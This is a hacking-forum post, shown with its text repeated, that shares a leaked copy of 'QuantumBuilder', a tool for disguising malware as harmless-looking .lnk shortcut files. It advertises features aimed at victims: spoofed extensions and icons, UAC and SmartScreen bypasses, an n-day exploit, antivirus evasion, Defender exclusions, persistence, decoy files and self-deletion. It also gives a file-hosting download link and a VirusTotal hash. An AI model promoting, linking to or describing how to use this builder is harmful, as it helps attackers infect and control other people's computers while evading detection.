bobrossisthebest
Member
- Thread Author
- #2
Welcome everyone,
QuantumBuilder will make your payload look like any file format (.png, .mp4, .doc, ...), you can even disguise them as a folder.
Macros are for the most part dead, this is the best method to deliver malicious code (apart from expensive 0-days)
There are countless articles about this very tool online, here are the major ones:
-> https://www.bleepingcomputer.com/news/se...m-builder/
-> https://blog.cyble.com/2022/06/22/quantu...opularity/
-> https://cn-sec.com/archives/1080507.html
Looking up "lnk quantum" is enough to see some more articles:
-> https://duckduckgo.com/?q=lnk+quantum+builder
Features:
![[Image: Screenshot-2023-02-15-005041.png]](https://i.ibb.co/RzGbBfL/Screenshot-2023-02-15-005041.png "[Image: Screenshot-2023-02-15-005041.png]")
![[Image: Screenshot-2023-02-15-005144.png]](https://i.ibb.co/f2Y86X3/Screenshot-2023-02-15-005144.png "[Image: Screenshot-2023-02-15-005144.png]")
Found this on telegram a while ago thought I'd share.
VT: https://www.virustotal.com/gui/file/76ff...3e7dfbbb20
[HIDE] https://anonfiles.com/R5D6j6Ycy6/QuantumBuilder_zip
[/HIDE]
Virustotal link https://www.virustotal.com/gui/file/76ff43fbda2f4610cd101f93b8dfedea74c3f120f02c25d48525af3e7dfbbb20
This leak has been rated as infected 1 times this month. (1 times in total)
QuantumBuilder will make your payload look like any file format (.png, .mp4, .doc, ...), you can even disguise them as a folder.
Macros are for the most part dead, this is the best method to deliver malicious code (apart from expensive 0-days)
There are countless articles about this very tool online, here are the major ones:
-> https://www.bleepingcomputer.com/news/se...m-builder/
-> https://blog.cyble.com/2022/06/22/quantu...opularity/
-> https://cn-sec.com/archives/1080507.html
Looking up "lnk quantum" is enough to see some more articles:
-> https://duckduckgo.com/?q=lnk+quantum+builder
Features:
- Spoof ANY extension
- 300+ different icons available (Microsoft Office ones included)
- UAC Bypass (VIP license and above only)
- Implementation of the dogwalk n-day exploit, more info below (Private license only)
- Bypass Windows Smartscreen, EV certs are a thing of the past
- Decoy (upon opening your .lnk a file of your choosing will be displayed on your victim's pc)
- Multiple payloads per .lnk file. Even if one gets detected the rest will still run
- Supported payload formats: .exe/.js/.vbs/.bat/.ps1/.msi
- Dll payloads (VIP license and above only)
- 100% FUD, even if you spread your stub. Every build is unique
- Choose the .lnk file size (VIP license and above only)
- Execute your exes with admin privileges by prompting UAC with a Microsoft signed binary (powershell.exe)
- Run your payload at startup, with a delay or when the victim's computer is idle
- Hide your payloads after executing them
- Melt .lnk after execution
- WD exclusion wrapper (VIP license and above only)
- Choose where your payload is dropped on your victim's computer
- Compress your shortcut in a .iso/.img/.cab
Found this on telegram a while ago thought I'd share.
VT: https://www.virustotal.com/gui/file/76ff...3e7dfbbb20
[HIDE] https://anonfiles.com/R5D6j6Ycy6/QuantumBuilder_zip
[/HIDE]
Virustotal link https://www.virustotal.com/gui/file/76ff43fbda2f4610cd101f93b8dfedea74c3f120f02c25d48525af3e7dfbbb20
This leak has been rated as infected 1 times this month. (1 times in total)
